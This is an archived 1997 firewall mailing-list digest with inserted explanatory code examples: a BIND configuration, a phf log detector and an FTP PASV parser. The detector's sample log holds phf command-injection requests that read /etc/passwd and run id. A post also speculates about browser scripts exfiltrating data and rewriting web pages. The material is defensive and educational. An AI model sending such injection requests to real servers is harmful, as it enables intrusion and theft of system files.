> >Background:
> >I am looking at setting up a DNS proxy using "forwarders" and "slave"
> >lines in my /etc/named.boot file as described in the "Building
> >Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do
> >this where I can maintain an internal Root name server.
> >For resolution
> >of domain names outside the internal top-level domains, I would like the
> >proxy name server (which will have an "external" domain name) be the
> >only name server queried by the internal root name server and having
> >this proxy be the only host to query external name servers. (I would
> >set up UDP port 53 filtering on the router.)
> >
> >Problem:
> >One problem I thought of concerns the mitigation between the internal
> >root name server and the forwarders/slave lines. If a subordinate
> >domain name server queries the root name server for an "outside" domain,
> >how would it know to forward the query to the proxy (being that it is an
> >internal root name server)? I could have my subordinate top-level
> >domain name servers query the proxy directly by putting a forwarders line
> >in its /etc/named.boot, however, this would bypass the internal root
> >structure. It seems to be straight forward w/o an internal root name
> >server, however, I need to maintain these root name servers. Can anyone
> >help.
> >
> >Thanks,
> >
> >rwm
> >
> The problem with an internal root server is that it won't take any account
> of your forwarders & slave options because it is said to be a root server.
> The only solution I think of is adding the noforward patch in the named
> daemons of the first level name servers you have under your root server.
> You just have to specify all the domains known by your internal root
> nameserver
> so that your lower level nameserver would query it but would forward to your
> proxy for everything else.
>
> Hope this helps
>
> Jean-Francois
>
> PS: the noforward patch is available for BIND on ftp.vix.com (but I can't
> remember the path...)

--
Adam Safier            asafier@csc.com        http://www.csc.com
CSC-SED-Infosec        (301) 794-1349         (301) 552-3272 (fax)
Technology Abuse: 1) Netscape Frames on a 14" screen.
                  2) Netscape 3.0 on a 386-33 w/ 8 Meg RAM.
The above are my own opinions. I'm proud to live in a country where I'm free to express them!
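Both the noforward patch Jean-Francois describes and Adam's "don't make the internal root a root" design are answers to the same limitation of BIND 4's named.boot: a forwarders/slave line applies to every query the server receives, so one server cannot forward Internet names to the firewall while following the internal root for internal names. As an added example (not from either message, and not something BIND 4 could express without the patch), here is how an internal nameserver states that split in BIND 9's named.conf: forwarding is on globally, and a forward zone with an empty forwarders list switches it off for one name and everything below it, so those queries follow the internal root's delegations instead. The addresses (192.0.2.53 for the firewall's resolver, 10.0.0.0/8 for internal clients) and the zone names corp.example, lab.example and sales.corp.example are assumptions.

```conf
// named.conf for an INTERNAL nameserver (added example, BIND 9 syntax).
// 192.0.2.53, 10.0.0.0/8 and the *.example zone names are assumptions.
options {
    directory "/var/named";
    recursion yes;
    allow-recursion { 10.0.0.0/8; };    // internal clients only

    // Default for everything not excepted below: hand the query to the
    // firewall's resolver and never go anywhere else. This is the
    // BIND 9 spelling of named.boot's "forwarders" plus "slave" lines.
    forward only;
    forwarders { 192.0.2.53; };
};

// Root hints name the INTERNAL root server, not the Internet roots.
// db.cache holds that server's NS record for "." and its A record.
zone "." {
    type hint;
    file "db.cache";
};

// Internal top-level names: an empty forwarders list cancels the global
// forwarding for this name and everything under it, so these queries
// are resolved by following delegations from the internal root.
zone "corp.example" {
    type forward;
    forwarders { };
};

zone "lab.example" {
    type forward;
    forwarders { };
};

// Reverse lookups for internal addresses need the same exception, or
// every PTR query for 10.x.x.x leaks to the firewall and fails there.
zone "10.in-addr.arpa" {
    type forward;
    forwarders { };
};

// Zones this server is authoritative for are declared as usual and are
// answered locally before any forwarding decision is made.
zone "sales.corp.example" {
    type master;
    file "db.sales.corp.example";
};
```

The internal root server itself carries only the delegations (NS records and glue) for the internal top-level names and needs no forwarders at all, which is the property Jean-Francois relied on. To check the split from an internal client, resolve one name in each class while watching the firewall resolver's query log: the Internet names should appear there and the internal ones should not.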
From firewalls-owner Thu Jan 2 14:20:16 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA05339 for firewalls-outgoing; Thu, 2 Jan 1997 13:38:14 -0800 (PST)
Received: from mail.epcorp.com (marauder.epcorp.com [198.30.14.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA05307 for ; Thu, 2 Jan 1997 13:37:51 -0800 (PST)
Received: from eppcmcw.eapi.com by mail.epcorp.com id aa23986; 2 Jan 97 16:31 EST
Message-Id: <3.0.32.19970102163131.00b1a550@hellcat.epcorp.com>
X-Sender: martinw@hellcat.epcorp.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Thu, 02 Jan 1997 16:31:36 -0500
To: firewalls@greatcircle.com
From: "Martin C. Walker"
Subject: syndefender (fw-1)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all,

Trying to determine if FW-1 itself (solaris x86) is susceptible to the TCP SYN denial of service attack, and if so then whether deploying their syndefender product (either gateway or relay) will help. Does anyone have any ideas regarding this? Since I don't allow any inbound connections to my machines other than the FW-1 (DNS/SMTP) I don't think anything else is at risk.

--------------------------------------------------------------------------
Martin C. Walker      | martinw@epcorp.com  | PP-ASEL,IFR AA5-A 9908U
Project Lead          | (513)629-2517       | Blue Belt Okinawan Shuri-Ryu
Eagle-Picher Inc.
                      | Fax: (513)629-2449  | Porsche 911SC
580 Walnut St,        |                     |
Cincinnati, OH 45202  |                     |

From firewalls-owner Thu Jan 2 14:59:28 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA09128 for firewalls-outgoing; Thu, 2 Jan 1997 14:17:01 -0800 (PST)
Received: from balder-int.ssds.com (balder.ssds.com [204.131.72.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA09108 for ; Thu, 2 Jan 1997 14:16:51 -0800 (PST)
Received: by balder-int.ssds.com id PAA29925; Thu, 2 Jan 1997 15:14:38 -0700 (MST)
Received: from baltimore.ssds.com(134.127.34.1) by balder.ssds.com via smap (3.2) id xma029914; Thu, 2 Jan 97 15:14:12 -0700
Received: by baltimore.ssds.com id RAA23131; Thu, 2 Jan 1997 17:15:32 -0500 (EST)
Message-Id: <2.2.32.19970102221336.0069bfd4@baltimore.ssds.com>
X-Sender: mam@baltimore.ssds.com (Unverified)
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 02 Jan 1997 17:13:36 -0500
To: FaNgYoU2
From: "Mike 'Will tame Cisco's for food' Malik"
Subject: Re: Lightweight Directory Access Protocol
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 07:41 PM 12/31/96 -0500, FaNgYoU2 wrote:
>Lightweight Directory Access Protocol (LDAP) is designed to be a low cost
>and low overhead way of accessing enterprise names directories that are
>based on X.500. A number of major LAN operating systems vendors have made
>statements that they will develop modules for their operating systems that
>will interact with LDAP enterprise names directories. My limited amount
>of web surfing showed that some development is being done in Unix to
>access LDAP as well as the traditional DNS.
> [SNIP]
>Any of you hot shot vendors or Chief Scientists or consultants that
>left firewall vendors for other companies doing any work to include
>LDAP enterprise directory access in firewalls?
You know I'm not sure I want all this flexibility going through my firewall. I'm sure someone might. I think this protocol might give all those "hot shot vendors and Chief Scientists" headaches for years to come. Of course this is just my take on the matter.

Mike

Multi-platform is 2 or more Microsoft OS's in a group                  ----_____u_
like_diversity__is_different__gendered__and_colored__fascists.__|--|______)-
o+o o+o o+o o+o o+o o+o o+o o+o o+o o+o o+o                            Q-Q-Q==\
______________________________________________________________________________
 \ / \ / \ / \ / /==============================\ \ /
 |\/| |\/| |\/| |\/|/                            \|\/|
 |/\| |/\| |/\| |/\||                            ||/\|
 |\/| |\/| |\/| |\/||                            ||\/|
 |/\|______|/\|___________|/\|____|/\||\............................../||/\|

From firewalls-owner Thu Jan 2 15:59:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA17175 for firewalls-outgoing; Thu, 2 Jan 1997 15:47:46 -0800 (PST)
Received: from deepeddy.com (DeepEddy.Com [192.12.3.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA17127 for ; Thu, 2 Jan 1997 15:47:27 -0800 (PST)
Received: (qmail 18940 invoked from network); 2 Jan 1997 23:46:55 -0000
Received: from localhost (HELO deepeddy.DeepEddy.Com) (@127.0.0.1) by localhost with SMTP; 2 Jan 1997 23:46:55 -0000
X-Mailer: exmh version 2.0beta 12/23/96
To: mcnabb@argus.cu-online.com (Paul McNabb)
Cc: Firewalls@GreatCircle.COM
Subject: Re: Read-only Web Site (was AF hack)
In-Reply-To: Your message of "Thu, 02 Jan 1997 12:41:29 CST."
             <199701021841.MAA21415@argus.cu-online.com>
X-Url: http://www.DeepEddy.Com/~cwg
From: cwg@DeepEddy.Com
Cc: cwg@DeepEddy.Com
Mime-Version: 1.0
Content-Type: multipart/signed; boundary="==_Exmh_1341457136P"; micalg=pgp-md5; protocol="application/pgp-signature"
Content-Transfer-Encoding: 7bit
Date: Thu, 02 Jan 1997 17:46:52 -0600
Message-ID: <18937.852248812@deepeddy.DeepEddy.Com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

--==_Exmh_1341457136P
Content-Type: text/plain; charset=us-ascii

> The web server has two network connections, but has IP forwarding
> disabled. Processes coming in from one network see all file systems
> as read-only (making /tmp RO is an option), and there is no mechanism
> for bypassing that, even if the process is root. All device special
> files are completely inaccessible to all processes and all users -- also
> mknod(2) is disabled. If a user comes in from the other network,
> he/she can access the system normally, except that UID 0 (root) is
> treated as a normal account in terms of OS privilege, so attacks from
> this direction are also more tightly controlled (special programs
> are provided to manage the system instead of using a special account
> such as root).
>
>                      +------------+
>     <-------------->|  Secured   |<-------------->
>     internal network | Web Site   | Internet/PublicNet
>    (RW file systems) +------------+ (RO file systems)
>
> When a Solaris host (x86 or SPARC) has been updated with this level
> of security, you can still use the r* commands, telnet, ftp, and
> even NFS from either side. You can have the RO restriction be done
> on a per-file basis as well, so you can be creative about your setup.

How do you do this?
Chris

--
Chris Garrigues                    O-         cwg@DeepEddy.Com
Deep Eddy Internet Consulting                 +1 512 432 4046
609 Deep Eddy Avenue
Austin, TX 78703-4513              http://www.DeepEddy.Com/~cwg/

--==_Exmh_1341457136P
Content-Type: application/pgp-signature

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

iQB1AwUBMsxI5ZaQnaaFII2dAQHcjQL+PanW9GVJcFhD451syHlSSONXy7fWtpsr
fPKtEq3nQGce+Wd6iOV15sD7QQagcvZQSyPf6QvsQ11P8xUGzFuiCa8oOvHnlm4k
aF6T5VcBg0aiesTmpannrDzuNiEYjdkF
=ces4
-----END PGP MESSAGE-----

--==_Exmh_1341457136P--

From firewalls-owner Thu Jan 2 16:37:40 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA17866 for firewalls-outgoing; Thu, 2 Jan 1997 15:57:53 -0800 (PST)
Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA17836 for ; Thu, 2 Jan 1997 15:57:28 -0800 (PST)
Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ga135752 for ; Fri, 3 Jan 1997 00:57:15 +0100
Received: by ppp46.sbbs.se with Microsoft Mail id <01BBF910.CFC863B0@ppp46.sbbs.se>; Fri, 3 Jan 1997 00:55:28 +0100
Message-ID: <01BBF910.CFC863B0@ppp46.sbbs.se>
From: Sebastian Stache
To: "'Firewalls (inet/GreatCircle)'"
Cc: "'long-morrow@CS.YALE.EDU'" , "'mjo@dojo.mi.org'"
Subject: RE: Air Force Web Site Hacked
Date: Fri, 3 Jan 1997 00:53:10 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BBF910.CFC863B0"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

------ =_NextPart_000_01BBF910.CFC863B0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Morrow wrote:
>You'd be surprised at how many NCSA httpd sites are
>still out there which are vulnerable to the attack:

You're right, I'm amazed. I've seen variations on the phf theme everywhere (including this list), so I would have thought a military organisation would know better.
And how many on this list do not know of bouncing mails in early versions of sendmail, or of NFS weaknesses (referring to Michael J. O'Conner's reply)? In a way it's comforting to hear that these sites are accessible to anyone capable of reading COAST, or any other primer on security - it definitely must mean that the cold war is really over.

Regards,

Sebastian Stache
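The phf attack Sebastian refers to is the sample CGI shipped with NCSA httpd and early Apache: its escape_shell_cmd() did not strip the newline character, so a %0a in the query string let a remote client append an arbitrary command to the one phf ran, and the canonical request fetched /etc/passwd. Since the point of the exchange is how many sites are still exposed, here is an added detection example (not from Sebastian's message or any tool named in the thread) that scans NCSA Common Log Format access-log lines for requests to phf and the other sample scripts of the same kind, URL-decodes the query string twice to catch double encoding, and flags decoded shell metacharacters. The log lines are constructed for the example and use documentation-range addresses.

```python
"""Find phf-style CGI command injection in NCSA Common Log Format access logs.

Added example, not from the mailing-list thread. The log lines at the bottom
are constructed for the illustration.
"""
import re
from urllib.parse import unquote

# CLF: host ident authuser [date] "request-line" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Sample scripts shipped in the NCSA / early Apache cgi-bin that passed
# user input to a shell. None of them belongs on a production server.
SUSPECT_SCRIPTS = ("phf", "test-cgi", "nph-test-cgi")

# Characters that end the intended argument and start a new shell command.
# Newline is the phf bug (escape_shell_cmd() did not strip it); the others
# are included because none of them is legitimate input to these scripts.
SHELL_BREAKS = ("\n", ";", "|", "`")


def parse_clf(line):
    """Return the CLF fields of one access-log line as a dict, or None."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_request(target):
    """Classify a request target (path plus optional query).

    Returns None for anything that does not name a suspect script,
    ("probe", script, detail) for a request to one without shell breaks
    (a scanner checking that it exists, or a real phf lookup), and
    ("exploit", script, detail) when the decoded query carries a shell
    metacharacter. The query is URL-decoded twice so that %0a, %0A and
    the double-encoded %250a are all caught.
    """
    path, _, query = target.partition("?")
    script = path.rsplit("/", 1)[-1]
    if script not in SUSPECT_SCRIPTS:
        return None
    decoded = unquote(unquote(query))
    for ch in SHELL_BREAKS:
        if ch in decoded:
            return ("exploit", script, "shell break %r in decoded query" % ch)
    return ("probe", script, "request for suspect script")


def scan_log(lines):
    """Return (host, severity, script, status, detail) for each flagged line."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        verdict = classify_request(rec["target"])
        if verdict is not None:
            severity, script, detail = verdict
            hits.append((rec["host"], severity, script, rec["status"], detail))
    return hits


# Constructed sample log. 198.51.100.7 is the scanner: existence check,
# the classic /etc/passwd fetch, then a double-encoded retry.
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [02/Jan/1997:19:16:25 -0500] "GET /index.html HTTP/1.0" 200 2326',
    '198.51.100.7 - - [02/Jan/1997:19:17:01 -0500] "GET /cgi-bin/phf HTTP/1.0" 200 512',
    '198.51.100.7 - - [02/Jan/1997:19:17:05 -0500] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1187',
    '198.51.100.7 - - [02/Jan/1997:19:17:09 -0500] '
    '"GET /cgi-bin/phf?Qalias=x%250a/bin/id HTTP/1.0" 200 96',
    '203.0.113.4 - - [02/Jan/1997:19:20:44 -0500] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 880',
    '203.0.113.4 - - [02/Jan/1997:19:21:00 -0500] "GET /cgi-bin/test-cgi?*%3B/bin/ls HTTP/1.0" 404 -',
]

if __name__ == "__main__":
    for host, severity, script, status, detail in scan_log(SAMPLE_ACCESS_LOG):
        print(f"{severity:<7} {host:<14} {script:<12} {status} {detail}")
```

The status column is the part to read first: a 200 on an "exploit" line means the server executed the request, while a 404 means the script was not there and the attempt failed, which is the state a site should be in. Any hit at all for a suspect script is a reason to delete it from cgi-bin rather than tune the detector.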
From firewalls-owner Thu Jan 2
17:00:49 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA20749 for firewalls-outgoing; Thu, 2 Jan 1997 16:18:48 -0800 (PST)
Received: from nova.dreamscape.com (nova.dreamscape.com [206.64.128.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA20650 for ; Thu, 2 Jan 1997 16:18:19 -0800 (PST)
Received: from garcia (sb9.dreamscape.com [206.114.183.170]) by nova.dreamscape.com (8.8.4/8.8.4) with SMTP id TAA22470 for ; Thu, 2 Jan 1997 19:17:59 -0500 (EST)
Message-ID: <32CC4FD9.70A9@future.dreamscape.com>
Date: Thu, 02 Jan 1997 19:16:25 -0500
From: Steve Matkoski
Reply-To: makoski@future.dreamscape.com
Organization: http://www.dreamscape.com/matkoski/netcon/
X-Mailer: Mozilla 3.0 (Win95; I)
MIME-Version: 1.0
To: Firewalls@GreatCircle.COM
Subject: Re: Untrusted vs. trusted network security
References: <199701010900.BAA10884@miles.greatcircle.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Paul Ferguson wrote:
> Ditto. PASV FTP works fine, lasts a long time. Even has growing
> client support. :-)
>

Where can I find info on PASV mode?

--
Thanks!
-steve.
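Since the question is where to read about PASV, here is the exchange itself as an added example (not from Steve's or Paul's messages). In active mode the client sends PORT and the server opens the data connection back to the client, which a firewall that blocks inbound connections in front of the client rejects; in passive mode (RFC 959) the client sends PASV, the server answers 227 with six decimal numbers (four for the address, two for the port, port = p1*256 + p2), and the client opens the data connection itself, so both connections are outbound from the client. The transcript below is constructed, the address 192.0.2.80 is an assumption, and the mismatch check is the sanity test a client needs when the server sits behind NAT and advertises an address other than the one the control connection is talking to.

```python
"""FTP passive mode: the PASV request and its 227 reply (RFC 959).

Added example, not from the mailing-list thread. Shows why PASV is the
firewall-friendly direction and how a client should parse and sanity-check
what the server advertises. The transcript is constructed, not captured.
"""
import re

# 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
# RFC 959 fixes the reply code and the six numbers, not the surrounding
# text, so match on the code and the numbers only.
PASV_REPLY_RE = re.compile(
    r"^227\D*(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})"
)


def parse_pasv_reply(reply):
    """Return (host, port) from a 227 reply; raise ValueError if it is not one."""
    m = PASV_REPLY_RE.match(reply.strip())
    if m is None:
        raise ValueError("not a 227 PASV reply: %r" % reply)
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        raise ValueError("octet out of range in %r" % reply)
    host = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    return host, port


def data_endpoint(reply, control_peer):
    """Decide where the client's data connection should go.

    A server behind NAT often advertises its private address in the 227
    reply. Connecting there would fail or, worse, reach a different host.
    If the advertised address differs from the peer of the control
    connection, use the control peer instead and report the mismatch.
    Returns (host, port, mismatch).
    """
    host, port = parse_pasv_reply(reply)
    if host != control_peer:
        return control_peer, port, True
    return host, port, False


# Constructed control-connection transcript (C = client, S = server).
# Both TCP connections are opened by the client: the control connection
# to port 21 first, then the data connection to the address and port the
# server names in its 227 reply. Nothing is connected back to the client,
# which is what lets a firewall that blocks inbound connections pass it.
TRANSCRIPT = [
    ("C", "USER anonymous"),
    ("S", "331 Guest login ok, send your email address as password."),
    ("C", "PASS ftp@example.com"),
    ("S", "230 Guest login ok, access restrictions apply."),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (192,0,2,80,195,89)."),
    # client now connects to 192.0.2.80 port 195*256+89 = 50009
    ("C", "RETR README"),
    ("S", "150 Opening BINARY mode data connection for README (2048 bytes)."),
    ("S", "226 Transfer complete."),
    ("C", "QUIT"),
    ("S", "221 Goodbye."),
]


def data_endpoint_from_transcript(transcript, control_peer):
    """Find the 227 reply in a transcript and resolve the data endpoint."""
    for who, line in transcript:
        if who == "S" and line.startswith("227"):
            return data_endpoint(line, control_peer)
    raise ValueError("no 227 reply in transcript")


if __name__ == "__main__":
    host, port, mismatch = data_endpoint_from_transcript(TRANSCRIPT, "192.0.2.80")
    print(f"data connection -> {host}:{port} (address mismatch: {mismatch})")
```

On the firewall side the price of PASV is that the data connection goes to a server port chosen at transfer time, so a packet filter in front of the client must allow outbound connections to high ports, or an FTP-aware proxy must read the 227 reply and open just that one. The range check in the parser matters for the same reason: a hostile server that gets the client to connect to an address or port of its choosing is steering connections from inside the firewall.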
matkoski@dreamscape.com

From firewalls-owner Thu Jan 2 17:13:06 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA22333 for firewalls-outgoing; Thu, 2 Jan 1997 16:35:19 -0800 (PST)
Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA22326 for ; Thu, 2 Jan 1997 16:35:11 -0800 (PST)
Received: by hidata.com; id AA11043; Thu, 2 Jan 97 16:34:46 PST
Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma011039; Thu, 2 Jan 97 16:34:42 -0800
Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8CB.CD6DDF40@oscntsrv.hidata.com>; Thu, 2 Jan 1997 16:41:29 -0800
Message-Id:
From: "Stout, Bill"
To: "'Firewall List'"
Subject: RE: Read-only Web Site (was AF hack)
Date: Thu, 2 Jan 1997 16:41:27 -0800
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At first glance that appears to be an easily hacked site. Maybe with deep thought one can imagine security working for a while... On second glance, security on that configuration still appears hackable.

That said, most of what goes on in this list is what I called in my L.A. Street racing days as 'bench racing' ("yea, I added a chrome shift knob and got five more horsepower"). When the pink slips come out, you know there's some serious hardware inside, but until then, it's mostly theoretical talk about what works and what doesn't until you get a F-WOS (Fed.-Web Oh Sh_t). The following contains bench racing. ;)

It is not easy to lock all of the incoming services from a specific port.
Disabling IP forwarding is a start, but if a system gateways to other systems inside, or to itself without a strong authentication mechanism, it is still vulnerable. You also need code smart enough to recognize trusted addresses coming in from the wrong port. Maybe your 7500 has a weak point, a vty password that actually is a word. The Cisco is close enough to successfully spoof trusted IP addresses.

Let's say someone on your internal network xxx.185.2.0(?) opened a HTTP connection out to a site. Wouldn't an ActiveX/Java/JavaScript application - 'some script' - be able to write to/collect data on an NFS-mounted drive which happens to be your webserver? A script could run commands to view network connections on an internal DOS or UNIX client, send the data back as cookies, process that data (grep for '/docs', or '/ns-home', or '/wwwroot'), then have the browser background-cache a new index.html document to that location. Maybe that new Trek screensaver from usenet does the same thing, or runs a '90s' version of 'Jive' on your index.html/default.htm page. An outside programmer could see some instant gratification from your home page.

Point is, I think your configuration needs more protection.

Bill Stout

On Thursday, January 02, 1997 10:41 AM, mcnabb@argus.cu-online.com wrote:
> The web server has two network connections, but has IP forwarding
> disabled. Processes coming in from one network see all file systems
> as read-only (making /tmp RO is an option), and there is no mechanism
> for bypassing that, even if the process is root. All device special
> files are completely inaccessible to all processes and all users -- also
> mknod(2) is disabled.
> If a user comes in from the other network,
> he/she can access the system normally, except that UID 0 (root) is
> treated as a normal account in terms of OS privilege, so attacks from
> this direction are also more tightly controlled (special programs
> are provided to manage the system instead of using a special account
> such as root).
>
>                         +------------+
>     <-------------->    |  Secured   |    <-------------->
>     internal network    |  Web Site  |    Internet/PublicNet
>     (RW file systems)   +------------+    (RO file systems)
>
> When a Solaris host (x86 or SPARC) has been updated with this level
> of security, you can still use the r* commands, telnet, ftp, and
> even NFS from either side. You can have the RO restriction be done
> on a per-file basis as well, so you can be creative about your setup.

From firewalls-owner Thu Jan 2 17:14:12 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24591 for firewalls-outgoing; Thu, 2 Jan 1997 16:57:59 -0800 (PST)
Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA24571 for ; Thu, 2 Jan 1997 16:57:50 -0800 (PST)
Received: from quinn-pc (slip-11-10.slip.shore.net [204.167.104.210]) by relay1.shore.net (8.8.3/8.8.3) with SMTP id TAA21902; Thu, 2 Jan 1997 19:54:42 -0500 (EST)
Message-ID: <32CC580D.2A58@shore.net>
Date: Thu, 02 Jan 1997 19:51:25 -0500
From: Vin McLellan
Organization: The Privacy Guild
X-Mailer: Mozilla 3.0 (WinNT; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: The Looong Reach of US Crypto-Export Controls (?)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Buried deep in the new Federal regs controlling crypto exports is a little gem of potential interest to this List.
Plucked from an extended discussion on the Cypherpunks List:

> >But it _specifically_ restricts virus-checkers (and, also, it would seem, backup programs, but that could be stretching it):
> >
> >ECCN 5D002.c.3:
> >
> ># ``Software'' designed or modified to protect against malicious
> ># computer damage, e.g., viruses

Virus checkers, programs like Tripwire, and (some, many, or all?) US firewall products are reported to be export controlled under the new regs... and subject to sale-by-sale license and export approval. Regardless of whether the software program uses crypto or not. True?

Software products which use Java applets and ActiveX controls (if they also have anti-virus components, likely to be demanded by users, at least in Europe) would also apparently fall within the new reg's hyperactive scope.

Suerte,
_Vin

(PS: Any estimates of sales, market share, or jobs which will be sacrificed if such a provision is enforced? Could the possibility of it being enforced mute the industry's voice in public debate about a domestic GAK law in '97? Any volunteers to explain to Congressmen that many great programmers are born and bred outside US jurisdictions?)
From firewalls-owner Thu Jan 2 17:16:10 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA23397 for firewalls-outgoing; Thu, 2 Jan 1997 16:46:18 -0800 (PST)
Received: from nova.dreamscape.com (nova.dreamscape.com [206.64.128.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA23351 for ; Thu, 2 Jan 1997 16:46:04 -0800 (PST)
Received: from garcia (sb9.dreamscape.com [206.114.183.170]) by nova.dreamscape.com (8.8.4/8.8.4) with SMTP id TAA23745 for ; Thu, 2 Jan 1997 19:45:56 -0500 (EST)
Message-ID: <32CC5666.647@future.dreamscape.com>
Date: Thu, 02 Jan 1997 19:44:22 -0500
From: Steve Matkoski
Reply-To: makoski@future.dreamscape.com
Organization: http://www.dreamscape.com/matkoski/netcon/
X-Mailer: Mozilla 3.0 (Win95; I)
MIME-Version: 1.0
To: Firewalls@GreatCircle.COM
Subject: internal filtering router - filter config?
References: <199701022212.OAA08595@miles.greatcircle.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What type of things would you filter on the internal router? Or even the external router? I am going to be installing a firewall real soon and would really appreciate any help.

-steve.
matkoski@dreamscape.com

From firewalls-owner Thu Jan 2 17:38:54 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA22802 for firewalls-outgoing; Thu, 2 Jan 1997 16:41:03 -0800 (PST)
Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA22767 for ; Thu, 2 Jan 1997 16:40:43 -0800 (PST)
Received: by hidata.com; id AA11058; Thu, 2 Jan 97 16:40:16 PST
Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma011056; Thu, 2 Jan 97 16:39:54 -0800
Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8CC.8767BC40@oscntsrv.hidata.com>; Thu, 2 Jan 1997 16:46:41 -0800
Message-Id:
From: "Stout, Bill"
To: "'firewalls@GreatCircle.COM'"
Subject: RE: Air Force Web Site Hacked -Reply
Date: Thu, 2 Jan 1997 16:46:40 -0800
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Why not make a webserver serve properly PGP-tagged documents only? Or did someone already invent that one too?
Bill Stout

From firewalls-owner Thu Jan 2 17:54:07 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA22659 for firewalls-outgoing; Thu, 2 Jan 1997 16:39:20 -0800 (PST)
Received: from news.rc.on.ca ([207.176.151.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA22630 for ; Thu, 2 Jan 1997 16:39:06 -0800 (PST)
Received: by mail.rc.on.ca with Internet Mail Service (5.0.1389.3) id <01BBF8E4.31FB8620@mail.rc.on.ca>; Thu, 2 Jan 1997 19:36:05 -0500
Message-ID: <41FDA823FC5AD011A0970000E8D5C66771A2@mail.rc.on.ca>
From: Russ
To: "'Jamie Thain'" , firewalls@greatcircle.com
Cc: "'info@on.com'"
Subject: RE: NT NAT
Date: Thu, 2 Jan 1997 19:36:05 -0500
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1389.3)
Content-Type: text/plain; charset="iso-8859-1"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>There is now an NT NAT. http://www.on.com.

I hate to do this without looking at the product first, but here's an excerpt from their web page describing the features their IP Funnel product provides;

    .Protects your internal IP servers and workstations from Internet hackers

